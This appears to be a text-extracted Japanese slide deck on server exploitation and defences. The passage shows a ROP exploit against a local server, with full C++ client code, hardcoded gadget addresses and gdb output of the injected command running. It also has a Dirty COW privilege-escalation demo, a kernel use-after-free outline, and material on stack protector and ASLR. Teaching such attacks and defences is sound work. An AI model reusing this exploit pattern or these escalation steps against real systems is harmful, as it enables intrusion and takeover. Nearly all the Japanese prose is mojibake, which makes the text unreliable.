    0x00007ffff6f624e0 <+0>: sub $0x128,%rsp
    0x00007ffff6f624e7 <+7>: mov %fs:0x10,%rdx

    Cݴޠඪ४ϥΠϒϥϦͷabortؔ਺ͷΞυϨε͕
    ελοΫͷreturnΞυϨεͷҐஔʹདྷΔΑ͏ʹ
    αʔόʹૹΔσʔλΛ࡞Δ

    View Slide

  34. $ ./pktgen
    ΫϥΠΞϯτ αʔό
    $ gdb -q ./tiny_server
    Reading symbols from ./tiny_server...done.
    (gdb) run
    Starting program: /home/fadis/tiny_server
    [Thread debugging using libthread_db
    enabled]
    Using host libthread_db library "/lib64/
    libthread_db.so.1".
    Program received signal SIGABRT, Aborted.
    0x00007ffff6f61228 in raise () from /
    lib64/libc.so.6
    (gdb) backtrace
    #0 0x00007ffff6f61228 in raise () from /
    lib64/libc.so.6
    #1 0x00007ffff6f6264a in abort () from /
    lib64/libc.so.6
    #2 0x0000000000000a0d in ?? ()
    #3 0x00007fffffffd5d0 in ?? ()
    SIGSEGVͰ͸ͳ͘SIGABRTͰαʔό͕ఀࢭͨ͠

    View Slide

  35. Program received signal SIGABRT, Aborted.
    0x00007ffff6f61228 in raise () from /
    lib64/libc.so.6
    (gdb) backtrace
    #0 0x00007ffff6f61228 in raise () from /
    lib64/libc.so.6
    #1 0x00007ffff6f6264a in abort () from /
    lib64/libc.so.6
    #2 0x0000000000000a0d in ?? ()
    #3 0x00007fffffffd5d0 in ?? ()
    #4 0x0000000000000042 in ?? ()
    #5 0x0000000000632ef0 in ?? ()
    #6 0x00007fffffffd340 in ?? ()
    #7 0x0000000000412898 in
    boost::get_pointer (
    p=access memory at address
    0xfffffffffffffff9>)
    at /usr/include/boost/get_pointer.hpp:
    69
    Backtrace stopped: previous frame inner to
    this frame (corrupt stack?)
    αʔόͷίʔυ্Ͱ͸
    ݺΜͰ͍ͳ͍
    abortؔ਺͕
    ݺ͹Εͨ͜ͱʹͳ͍ͬͯΔ

    View Slide

  36. ߈ܸऀ͕ࢦఆͨؔ͠਺͕
    ࣮ߦ͞Εͯ͠·ͬͨ

    View Slide

  37. ߈ܸऀ͸αʔόͷίϯτϩʔϧΛखʹೖΕ͍ͨ
    ͦͷͨΊʹ͸shellΛىಈ͍ͨ͠
    खͬऔΓૣ͘shellΛ্ཱͪ͛Δʹ͸
    system("࣮ߦ͍ͨ͠ίϚϯυ");
    Λݺ΂Ε͹ྑ͍
    ೚ҙͷؔ਺Λݺ΂Δ͚ͩͰͳ͘
    ೚ҙͷจࣈྻΛҾ਺ͱͯ͠౉ͤΔඞཁ͕͋Δ

    View Slide

  38. [1] System V Application Binary Interface AMD64 Architecture Processor Supplement
    §3.5.7 Variable Argument Lists
    x86_64 LinuxͰ͸ؔ਺ͷୈҰҾ਺͸
    %rdiϨδελͰ౉͢͜ͱʹͳ͍ͬͯΔ[1]
    ࣮ߦ͍ͨ͠ίϚϯυΛϝϞϦʹॻ্͍ͨͰ
    Կͱ͔ͯͦ͠ͷΞυϨεΛ%rdiʹ৐ͤͯ
    retqͰؔ਺Λݺͼग़͢ඞཁ͕͋Δ
    rax rbp r8 r12
    rbx rsp r9 r13
    rcx rsi r10 r14
    rdx rdi r11 r15

    View Slide

  39. (gdb) disas _ZNSi6ignoreEl

    0x00007ffff788dfc5 <+309>: pop %r14
    0x00007ffff788dfc7 <+311>: retq
    0x7ffff788dfc5
    ඪ४ϥΠϒϥϦ౳͔Βpopͯ͠retq͍ͯ͠ΔॴΛ୳ͯ͘͠Δ
    %r14ʹஔ͖͍ͨ஋
    ͦͷޙʹ࣮ߦ͍ͨ͠ΞυϨε
    ελοΫʹࠨͷΑ͏ʹॻ͍ͯretq͢Δͱ
    %r14ʹ೚ҙͷ஋Λஔ͘͜ͱ͕Ͱ͖Δ
    Return Oriented Programming
    ૢ࡞͍ͨ͠ϨδελΛpopͯ͠retq͍ͯ͠ΔॴΛݟ͚ͭΕ͹
    ೚ҙͷҾ਺Λ͚ͭͯ೚ҙͷؔ਺Λݺͼग़͢͜ͱ͕Ͱ͖Δ

    View Slide

  40. #include
    #include
    int main() {
    namespace asio = boost::asio;
    using boost::asio::ip::tcp;
    asio::io_service io_service;
    tcp::socket socket(io_service);
    socket.connect(
    tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 )
    );
    const std::vector< uint8_t > command{
    't', 'o', 'u', 'c', 'h', ' ', 'a', 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    };
    std::vector< uint8_t > data {
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00,
    0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00,
    0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
    ࡉ޻ͨ͠σʔλΛૹΔΫϥΠΞϯτ
    ద౰ͳϑΝΠϧΛ࡞੒

    View Slide

  41. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00,
    0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00,
    0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
    0xc0, 0xe5, 0x00, 0xf7, 0xff, 0x7f, 0x00, 0x00,
    0x90, 0x3b, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00
    };
    for( size_t i = 0u; i != 10u; ++i )
    std::copy( command.begin(), command.end(), std::back_inserter( data ) );
    data.push_back( 0x0d );
    data.push_back( 0x0a );
    boost::system::error_code error;
    asio::write(socket, asio::buffer(data), error);
    return 0;
    if( !error ) {
    asio::streambuf receive_buffer;
    asio::read_until(socket, receive_buffer, '\n', error);
    std::cout << asio::buffer_cast(receive_buffer.data()) << std::endl;
    }
    }
    ࡉ޻ͨ͠σʔλΛૹΔΫϥΠΞϯτ

    View Slide

  42. tcp::socket socket(io_service);
    socket.connect(
    tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 )
    );
    const std::vector< uint8_t > command{
    't', 'o', 'u', 'c', 'h', ' ', 'a', 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    };
    std::vector< uint8_t > data {
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00,
    0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00,
    0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
    0xc0, 0xe5, 0x00, 0xf7, 0xff, 0x7f, 0x00, 0x00,
    0x90, 0x3b, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00
    };
    for( size_t i = 0u; i != 10u; ++i )
    std::copy( command.begin(), command.end(), std::back_inserter( data ) );
    data.push_back( 0x0d );
    ࡉ޻ͨ͠σʔλΛૹΔΫϥΠΞϯτ
    QPQSEJͯ͠SFURͯ͠Δίʔυʹ
    ඈͿͨΊͷΞυϨε
    SEJʹ৐ͤΔ஋
    ࣮ߦ͍ͨ͠ίϚϯυ

    system()
    sync()
    exit()
    γΣϧεΫϦϓτ

    View Slide

  43. $ ./pktgen
    ΫϥΠΞϯτ αʔό
    $ gdb -q ./tiny_server
    Reading symbols from ./tiny_server...done.
    (gdb) run
    Starting program: /home/fadis/tiny_server
    [Thread debugging using libthread_db
    enabled]
    Using host libthread_db library "/lib64/
    libthread_db.so.1".
    [Inferior 1 (process 11310) exited with
    code 02]
    (gdb) quit
    $ ls
    a tiny_server
    ͳΜ͔Ͱ͖ͯΔ

    View Slide

  44. ߈ܸऀ͕αʔό্Ͱ
    ೚ҙͷૢ࡞Λग़དྷͯ͠·ͬͨ

    View Slide

  45. ߈ܸऀ͕࣮ߦͨ͠shell͸
    ߈ܸΛड͚ͨϓϩηεΛ࣮ߦͨ͠ϢʔβͷݖݶͰಈ͘
    ߈ܸΛड͚ͨϓϩηε͕
    rootͰಈ͍͍ͯͳ͔ͬͨ৔߹
    ߈ܸऀ͸αʔόͷ׬શͳঠѲͷͨΊʹ
    ݖݶঢ֨Λߦ͏ඞཁ͕͋Δ
    Permission Denied

    View Slide

  46. ݖݶঢ֨ʹ༻͍ΒΕΔ੬ऑੑͷྫ
    https://dirtycow.ninja/
    ͜͜ʹ
    %*35:$08ͷτοϓϖʔδΛషΔ

    View Slide

  47. DIRTY COW(CVE-2016-5195)
    mmap࣌ʹMAP_PRIVATEΛ͚ͭΔͱ
    ϑΝΠϧʹର͢Δॻ͖ࠐΈΛ
    ΦϦδφϧͷϑΝΠϧʹ
    ॻ͔ͳ͍Α͏ʹ͢Δ͜ͱ͕Ͱ͖Δ
    ॻ͖ࠐΈ
    ಡΈग़͠
    ϓϩηε͔Β
    ݟͨϑΝΠϧ
    ΦϦδφϧͷ
    ϑΝΠϧ
    ΞυϨεۭؒ

    View Slide

  48. DIRTY COW(CVE-2016-5195)
    ʮ࢑͘࢖Θͳ͍͔Βॻ͖ࠐΈͷ४උΛϝϞϦ͔ΒԼ͛ͯྑ͍ʯ
    ࢦఆΛߦ͏ͷͱಉ࣌ʹॻ͖ࠐΈΛߦ͏ͱ
    ΦϦδφϧͷϑΝΠϧʹॻ͍ͯ͠·͏ෆ۩߹
    ΦϦδφϧͷϑΝΠϧʹ
    ॻ͖ʹ͍ͬͯ͠·͏
    ϓϩηε͔Β
    ݟͨϑΝΠϧ
    ΦϦδφϧͷ
    ϑΝΠϧ
    MADV_DONTNEEDͰ
    ϝϞϦ͔ΒԼ͛Δ

    View Slide

  49. DIRTY COW(CVE-2016-5195)
    https://github.com/kcgthb/RHEL6.x-COW/blob/master/6.7/noc0w.patch
    ͜ͷෆ۩߹ࣗମ͸ෳࡶͳ΋ͷͰ͸ͳ͘मਖ਼ύον͸ߦఔ
    ͜͜ʹ
    %*35:$08ͷमਖ਼ύονΛషΔ

    View Slide

  50. DIRTY COW(CVE-2016-5195)
    root # echo 'abcde' >sample.txt
    root # ls -lha sample.txt
    -rw-r--r-- 1 root root 6 Mar 18 11:21 sample.txt
    root # logout
    non_root $ cat sample.txt
    abcde
    non_root $ ./dirtyc0w sample.txt ‘pwned'
    mmap 7f214599a000
    ^C
    non_root $ cat sample.txt
    pwned
    non_root $ ls -lha sample.txt
    -rw-r--r-- 1 root root 6 3݄ 18 11:21 sample.txt
    ҰൠϢʔβ͕
    root͔͠ॻ͚ͳ͍ϑΝΠϧΛ
    ॻ͖׵͑ͯ͠·ͬͨ
    ͜Ε͕ՄೳͳΒrootϩάΠϯͷೝূΛແ͘͢͜ͱͩͬͯग़དྷΔ

    View Slide

  51. CVE-2017-15265
    ALSA Sequencer[1]ͷϙʔτΛ࡞͙ͬͯ͢ʹഁغ͢Δ
    [1] ALSA Sequencer http://www.alsa-project.org/~frank/alsa-sequencer/index.html
    Ϣʔβۭؒ Χʔωϧۭؒ
    ϙʔτ͍ͩ͘͞
    Ͳ͏ͧ
    ϙʔτͷͨΊͷ
    ྖҬͷ֬อ
    ϙʔτΛॳظԽ
    εϨου1 εϨου1
    ϙʔτ΋͏͍͍΍ ϙʔτͷͨΊͷ
    ྖҬͷղ์
    εϨου2 εϨου2
    ͠Α͏ͱࢥͬͨΒ
    ແ͔ͬͨ

    View Slide

  52. ͜͜ʹ
    -JOVYΧʔωϧͷ
    "-4"4FRVFODFSͷॳظԽதͰ
    ίʔϧόοΫΛಡΜͰ͍ΔՕॴΛషΔ
    Use After Free
    Χʔωϧͷߏ଄ମʹ͸ଟ਺ͷίʔϧόοΫؔ਺͕ઃఆ͞Ε͍ͯΔ
    ղ์ࡁΈͷϝϞϦ͸ಉαΠζͷϝϞϦΛ֬อ͢Δͱ
    ߴ֬཰Ͱಉ͡ྖҬΛऔಘͰ͖Δ
    ίʔϧόοΫΛ೚ҙͷΞυϨεʹॻ͖׵͑ͯΧʔωϧʹݺ͹ͤΔ
    https://elixir.bootlin.com/linux/v4.15.10/source/sound/core/seq/seq_clientmgr.c#L619
    ϙʔτ͸΋͏ղ์͞ΕͯΔ͚Ͳ
    ͜͜Ͱϙʔτʹઃఆ͞Εͨ
    ίʔϧόοΫΛݺΜͰΔ

    View Slide

  53. Use After Free
    ͜ΕΛར༻ͯ͠ԿΛݺ͹ͤΔ͔
    ͦΕ͸΋ͪΖΜ
    commit_creds( prepare_kernel_cred( NULL ) );
    ༁ԶΛrootʹ͠Ζ
    ղ์ࡁΈͷྖҬ͔ΒίʔϧόοΫΛݺͿঢ়ଶʹ͑͞Ͱ͖Ε͹
    ͜ͷ߈ܸ͕੒ཱ͢ΔՄೳੑ͕͋ΔͨΊ
    Use After FreeΛ࢖ͬͨݖݶঢ֨੬ऑੑ͸සൟʹݟ͔ͭΔ

    View Slide

  54. Use After Free
    $7&
    $7&
    $7&
    ղ์ࡁΈͷྖҬ͔ΒίʔϧόοΫΛݺͿঢ়ଶʹ͑͞Ͱ͖Ε͹
    ͜ͷ߈ܸ͕੒ཱ͢ΔՄೳੑ͕͋ΔͨΊ
    Use After FreeΛ࢖ͬͨݖݶঢ֨੬ऑੑ͸සൟʹݟ͔ͭΔ
    $7&
    $7&
    $7&
    $7&

    View Slide

  55. ߈ܸऀ͕αʔόΛ
    ׬શʹঠѲͯ͠͠·ͬͨ

    View Slide

  56. ࠣࡉͳෆ۩߹͕
    ͠͹͠͹αʔόͷ
    ηΩϡϦςΟΛ୆ແ͠ʹ͢Δ

    View Slide

  57. Ұ൪ྑ͍ͷ͸ෆ۩߹͕ແ͍ࣄ͕ͩ
    ͦ͏͸͍ͬͯ΋ෆ۩߹͸ग़ͯ͘ΔͷͰ
    ෆ۩߹͸ग़Δ΋ͷͱͯ͠
    ग़དྷΔ͚ͩக໋తͳ߈ܸʹ௚݁ͤ͞ͳ͍ҝͷ
    ରॲΛߦ͏ඞཁ͕͋Δ

    View Slide

  58. TUBDLQSPUFDUPS
    f:
    push %rbp
    mov %rsp,%rbp
    sub $0x20,%rsp
    mov %edi,-0x14(%rbp)
    mov %esi,-0x18(%rbp)
    mov %fs:0x28,%rax
    mov %rax,-0x8(%rbp)
    xor %eax,%eax
    mov -0x14(%rbp),%edx
    mov -0x18(%rbp),%eax
    add %edx,%eax
    mov -0x8(%rbp),%rcx
    xor %fs:0x28,%rcx
    je 40055f
    callq 400400 <[email protected]>
    leaveq
    retq
    f:
    push %rbp
    mov %rsp,%rbp
    mov %edi,-0x4(%rbp)
    mov %esi,-0x8(%rbp)
    mov -0x4(%rbp),%edx
    mov -0x8(%rbp),%eax
    add %edx,%eax
    pop %rbp
    retq
    ͋Δ࣌
    ͳ͍࣌
    gccͷ࠷దԽΦϓγϣϯͷ1ͭ
    ͳΜ͔
    ૿͑ͯΔ

    View Slide

  59. TUBDLQSPUFDUPS
    f:
    push %rbp
    mov %rsp,%rbp
    sub $0x20,%rsp
    mov %edi,-0x14(%rbp)
    mov %esi,-0x18(%rbp)
    mov %fs:0x28,%rax
    mov %rax,-0x8(%rbp)
    xor %eax,%eax
    mov -0x14(%rbp),%edx
    mov -0x18(%rbp),%eax
    add %edx,%eax
    mov -0x8(%rbp),%rcx
    xor %fs:0x28,%rcx
    je 40055f
    callq 400400 <[email protected]>
    leaveq
    retq
    ͋ΔݻఆͷΞυϨε͔ΒಡΜͩ஋Λ
    ελοΫʹੵΉ
    ઌఔͱಉ͡ΞυϨε͔ΒಡΜͩ஋ͱ
    ελοΫͷ஋Λൺֱ͠
    Ұக͠ͳ͔ͬͨΒabort͢Δ

    View Slide

  60. TUBDLQSPUFDUPS
    ؔ਺gͷม਺
    ؔ਺gͷม਺
    ؔ਺gͷม਺
    ؔ਺f͕ऴΘͬͨΒ໭ΔҐஔ
    ؔ਺fͷม਺
    ؔ਺fͷม਺
    ؔ਺gͷSCQ
    ϥϯμϜͳ஋
    όοϑΝΦʔόʔϥϯͰ
    returnΞυϨεΛॻ͖׵͑Δʹ͸
    ͜͜·Ͱॻ͖ࠐΉඞཁ͕͋Δ
    ؒʹڬ·͍ͬͯΔ
    ͜ͷ஋Λॻ͖׵͑ͯ͠·͏ͱ
    ϓϩάϥϜ͸ҟৗऴྃ͢Δ
    όοϑΝΦʔόʔϥϯΛར༻ͨ͠
    ೚ҙͷίʔυͷ࣮ߦ͕ͱͯ΋೉͘͠ͳΔ

    View Slide

  61. TUBDLQSPUFDUPS
    xor %eax,%eax
    mov -0x14(%rbp),%edx
    mov -0x18(%rbp),%eax
    add %edx,%eax
    mov -0x8(%rbp),%rcx
    xor %fs:0x28,%rcx
    je 40055f
    callq 400400 <[email protected]>
    leaveq
    retq
    ઌఔͱಉ͡ΞυϨε͔ΒಡΜͩ஋ͱ
    ελοΫͷ஋Λൺֱ͠
    Ұக͠ͳ͔ͬͨΒabort͢Δ
    ελοΫ͕ഁյ͞ΕͨޙͳͷͰ
    ຊདྷͷॲཧʹ໭Δ͜ͱ͸Ͱ͖ͳ͍
    stack-protector͸
    ߈ܸऀ͕೚ҙͷίʔυΛ࣮ߦͰ͖Δ੬ऑੑΛ
    ߈ܸऀ͕DoS߈ܸΛͰ͖Δ੬ऑੑʹऑΊΔ

    View Slide

  62. ͜͜ʹ
    3FE)BUʹΑΔ#MVFCPSOFͷղઆΛషΔ
    https://access.redhat.com/security/vulnerabilities/blueborne
    ࣮ࡍʹTUBDLQSPUFDUPS͕໾ʹཱ͍ͬͯΔέʔε
    Blueborne(CVE-2017-1000251)
    γεςϜʹBluetoothͰ઀ଓͰ͖Δೝূ͞Ε͍ͯͳ͍Ϣʔβ͕
    γεςϜΛΫϥογϡͤ͞Δࣄ͕Ͱ͖Δ
    ͋Δ͍͸stack protector͕༗ޮʹͳ͍ͬͯͳ͍৔߹
    ೚ҙͷίʔυ͕࣮ߦ͞ΕΔՄೳੑ͕͋Δ

    View Slide

  63. TUBDLQSPUFDUPS
    stack protector͸ελοΫΛগ͠༨෼ʹ࢖͍
    ϝϞϦΞΫηεͱൺֱ͕༨෼ʹൃੜ͢Δ
    -fno-stack-protector(σϑΥϧτ)
    -fstack-protector(͓͢͢Ί)
    -fstack-protector-all
    stack protectorΛ࢓ֻ͚ͳ͍
    όΠτҎ্ͷจࣈྻΛѻ͏ؔ਺ʹstack protectorΛ࢓ֻ͚Δ
    ͋ΒΏΔؔ਺ʹstack protectorΛ࢓ֻ͚Δ
    ࢓ֻ͚͓ͯ͘ͱ໾ʹཱͭͱ͜Ζ͚ͩʹ࢓ֻ͚͓͖͍ͯͨ

    View Slide

  64. TUBDLQSPUFDUPS
    stack protector͸
    ελοΫ্ͰͷϝϞϦഁյΛݕ஌͢Δ
    όοϑΝΦʔόʔϥϯ͕ώʔϓ্ͳͲͷ
    ελοΫҎ֎ͷ৔ॴͰى͜Γ
    ͦΕʹΑͬͯഁյ͞ΕͨΞυϨεʹδϟϯϓ͕Մೳͳ৔߹
    stack protector͸߈ܸΛ๷͙ࣄ͕Ͱ͖ͳ͍

    View Slide

  65. address space layout randomization
    $ cat /proc/self/maps
    00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat

    00608000-00629000 rw-p 00000000 00:00 0 [heap]
    7f9e54cd8000-7f9e5b63d000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive
    7f9e5b63d000-7f9e5b7cc000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so

    7ffeb0a50000-7ffeb0a72000 rw-p 00000000 00:00 0 [stack]
    7ffeb0b87000-7ffeb0b89000 r--p 00000000 00:00 0 [vvar]
    7ffeb0b89000-7ffeb0b8b000 r-xp 00000000 00:00 0 [vdso]
    ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
    $ cat /proc/self/maps
    00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat

    00608000-00629000 rw-p 00000000 00:00 0 [heap]
    7f5e24988000-7f5e2b2ed000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive
    7f5e2b2ed000-7f5e2b47c000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so

    7fffe276e000-7fffe2790000 rw-p 00000000 00:00 0 [stack]
    7fffe27c2000-7fffe27c4000 r--p 00000000 00:00 0 [vvar]
    7fffe27c4000-7fffe27c6000 r-xp 00000000 00:00 0 [vdso]
    ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
    ϓϩηεΛىಈ͢ΔͨͼʹϝϞϦϨΠΞ΢τΛม͑Δ
    1ճ໨
    2ճ໨

    View Slide

  66. address space layout randomization
    $ cat /proc/self/maps
    00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat

    00608000-00629000 rw-p 00000000 00:00 0 [heap]
    7f9e54cd8000-7f9e5b63d000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive
    7f9e5b63d000-7f9e5b7cc000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so

    7ffeb0a50000-7ffeb0a72000 rw-p 00000000 00:00 0 [stack]
    7ffeb0b87000-7ffeb0b89000 r--p 00000000 00:00 0 [vvar]
    7ffeb0b89000-7ffeb0b8b000 r-xp 00000000 00:00 0 [vdso]
    ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
    $ cat /proc/self/maps
    00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat

    00608000-00629000 rw-p 00000000 00:00 0 [heap]
    7f5e24988000-7f5e2b2ed000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive
    7f5e2b2ed000-7f5e2b47c000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so

    7fffe276e000-7fffe2790000 rw-p 00000000 00:00 0 [stack]
    7fffe27c2000-7fffe27c4000 r--p 00000000 00:00 0 [vvar]
    7fffe27c4000-7fffe27c6000 r-xp 00000000 00:00 0 [vdso]
    ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
    ϓϩηεΛىಈ͢ΔͨͼʹϝϞϦϨΠΞ΢τΛม͑Δ
    1ճ໨
    2ճ໨
    ελοΫͷΞυϨε͕࣮ߦ͢ΔͨͼʹมԽ͍ͯ͠Δ
    7ffeb0a50000-7ffeb0a72000
    7fffe276e000-7fffe2790000
    system()ʹ౉͢ҝʹॻ͖ࠐΜͩ
    γΣϧεΫϦϓτͷΞυϨε͕ຖճมΘΔҝ
    εΫϦϓτͷ࣮ߦ͕ͱͯ΋೉͘͠ͳΔ

    View Slide

  67. address space layout randomization
    $ cat /proc/self/maps
    00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat

    00608000-00629000 rw-p 00000000 00:00 0 [heap]
    7f9e54cd8000-7f9e5b63d000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive
    7f9e5b63d000-7f9e5b7cc000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so

    7ffeb0a50000-7ffeb0a72000 rw-p 00000000 00:00 0 [stack]
    7ffeb0b87000-7ffeb0b89000 r--p 00000000 00:00 0 [vvar]
    7ffeb0b89000-7ffeb0b8b000 r-xp 00000000 00:00 0 [vdso]
    ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
    $ cat /proc/self/maps
    00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat

    00608000-00629000 rw-p 00000000 00:00 0 [heap]
    7f5e24988000-7f5e2b2ed000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive
    7f5e2b2ed000-7f5e2b47c000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so

    7fffe276e000-7fffe2790000 rw-p 00000000 00:00 0 [stack]
    7fffe27c2000-7fffe27c4000 r--p 00000000 00:00 0 [vvar]
    7fffe27c4000-7fffe27c6000 r-xp 00000000 00:00 0 [vdso]
    ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
    ϓϩηεΛىಈ͢ΔͨͼʹϝϞϦϨΠΞ΢τΛม͑Δ
    1ճ໨
    2ճ໨
    ϥΠϒϥϦͷ഑ஔ΋࣮ߦ͢ΔͨͼʹมԽ
    7f9e5b63d000-7f9e5b7cc000
    7f5e2b2ed000-7f5e2b47c000
    system()౳͕ஔ͔Ε͍ͯΔΞυϨε΋
    ϥϯμϜʹมԽ͢Δҝ
    ೚ҙͷίʔυͷ࣮ߦ͕ͱͯ΋೉͘͠ͳΔ

    View Slide

  68. $ gdb -q ./tiny_server
    Reading symbols from ./tiny_server...done.
    (gdb) set disable-randomization off
    (gdb) run
    Starting program: /home/fadis/tiny_server_test/tiny_server
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib64/libthread_db.so.1".
    Program received signal SIGSEGV, Segmentation fault.
    0x00007ffff7931f54 in ?? ()
    (gdb) backtrace
    #0 0x00007ffff7931f54 in ?? ()
    #1 0x00007fffffffd3a0 in ?? ()
    #2 0x00007ffff6f6d350 in ?? ()
    #3 0x00007ffff700e5c0 in ?? ()
    #4 0x00007ffff6f63b90 in ?? ()
    #5 0x0061206863756f74 in ?? ()
    #6 0x0000000000000000 in ?? ()
    (gdb) p &system
    $1 = ( *) 0x7f51c76cd350
    (gdb) disas 0x7ffff7931f54
    No function contains specified address.
    ઌఔγΣϧͷ࣮ߦʹ੒ޭͨ͠ྫΛASLR༗ΓͰߦͳͬͨ৔߹

    View Slide

  69. $ gdb -q ./tiny_server
    Reading symbols from ./tiny_server...done.
    (gdb) set disable-randomization off
    (gdb) run
    Starting program: /home/fadis/tiny_server_test/tiny_server
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib64/libthread_db.so.1".
    Program received signal SIGSEGV, Segmentation fault.
    0x00007ffff7931f54 in ?? ()
    (gdb) backtrace
    #0 0x00007ffff7931f54 in ?? ()
    #1 0x00007fffffffd3a0 in ?? ()
    #2 0x00007ffff6f6d350 in ?? ()
    #3 0x00007ffff700e5c0 in ?? ()
    #4 0x00007ffff6f63b90 in ?? ()
    #5 0x0061206863756f74 in ?? ()
    #6 0x0000000000000000 in ?? ()
    (gdb) p &system
    $1 = ( *) 0x7f51c76cd350
    (gdb) disas 0x7ffff7931f54
    No function contains specified address.
    ઌఔγΣϧͷ࣮ߦʹ੒ޭͨ͠ྫΛASLR༗ΓͰߦͳͬͨ৔߹
    system()͕ظ଴ͨ͠ΞυϨεͱҟͳΔ৔ॴʹ഑ஔ͞Ε͍ͯΔ
    0x00007ffff6f6d350
    0x7f51c76cd350
    ASLRແ͠ͷ৔߹ʹsystem()͕ஔ͍ͯ͋ͬͨ৔ॴ
    ࣮ࡍʹsystem()͕
    ഑ஔ͞Ε͍ͯͨ৔ॴ

    View Slide

  70. $ gdb -q ./tiny_server
    Reading symbols from ./tiny_server...done.
    (gdb) set disable-randomization off
    (gdb) run
    Starting program: /home/fadis/tiny_server_test/tiny_server
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib64/libthread_db.so.1".
    Program received signal SIGSEGV, Segmentation fault.
    0x00007ffff7931f54 in ?? ()
    (gdb) backtrace
    #0 0x00007ffff7931f54 in ?? ()
    #1 0x00007fffffffd3a0 in ?? ()
    #2 0x00007ffff6f6d350 in ?? ()
    #3 0x00007ffff700e5c0 in ?? ()
    #4 0x00007ffff6f63b90 in ?? ()
    #5 0x0061206863756f74 in ?? ()
    #6 0x0000000000000000 in ?? ()
    (gdb) p &system
    $1 = ( *) 0x7f51c76cd350
    (gdb) disas 0x7ffff7931f54
    No function contains specified address.
    ઌఔγΣϧͷ࣮ߦʹ੒ޭͨ͠ྫΛASLR༗ΓͰߦͳͬͨ৔߹
    ͦΕҎલʹ࠷ॳʹpop %rdi͢Δҝͷίʔυย͕
    ظ଴ͨ͠৔ॴʹͳ͍
    0x00007ffff7931f54
    No function contains specified address
    ASLRແ͠ͷ৔߹ʹpop %rdiͱretq͕͋ͬͨ৔ॴ
    ͦ͜ʹؔ਺͸ແ͍

    View Slide

  71. $ gdb -q ./tiny_server
    Reading symbols from ./tiny_server...done.
    (gdb) set disable-randomization off
    (gdb) run
    Starting program: /home/fadis/tiny_server_test/tiny_server
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib64/libthread_db.so.1".
    Program received signal SIGSEGV, Segmentation fault.
    0x00007ffff7931f54 in ?? ()
